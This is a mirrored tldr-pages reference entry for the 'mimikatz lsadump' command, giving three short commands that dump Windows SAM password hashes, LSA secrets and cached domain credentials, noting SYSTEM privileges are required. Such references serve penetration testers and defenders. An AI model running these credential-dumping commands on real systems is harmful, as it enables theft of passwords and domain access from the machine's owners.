mirror of
https://github.com/tldr-pages/tldr.git
synced 2025-08-20 05:55:44 +02:00
17 lines
358 B
Markdown
17 lines
358 B
Markdown
# mimikatz lsadump
|
|
|
|
> Dump secrets from the Windows Local Security Authority (LSA).
|
|
> Requires SYSTEM privileges.
|
|
> More information: <https://github.com/gentilkiwi/mimikatz>.
|
|
|
|
- Dump SAM hashes:
|
|
|
|
`mimikatz "lsadump::sam"`
|
|
|
|
- Dump secrets from the SECURITY hive:
|
|
|
|
`mimikatz "lsadump::secrets"`
|
|
|
|
- Dump cached domain credentials:
|
|
|
|
`mimikatz "lsadump::cache"`
|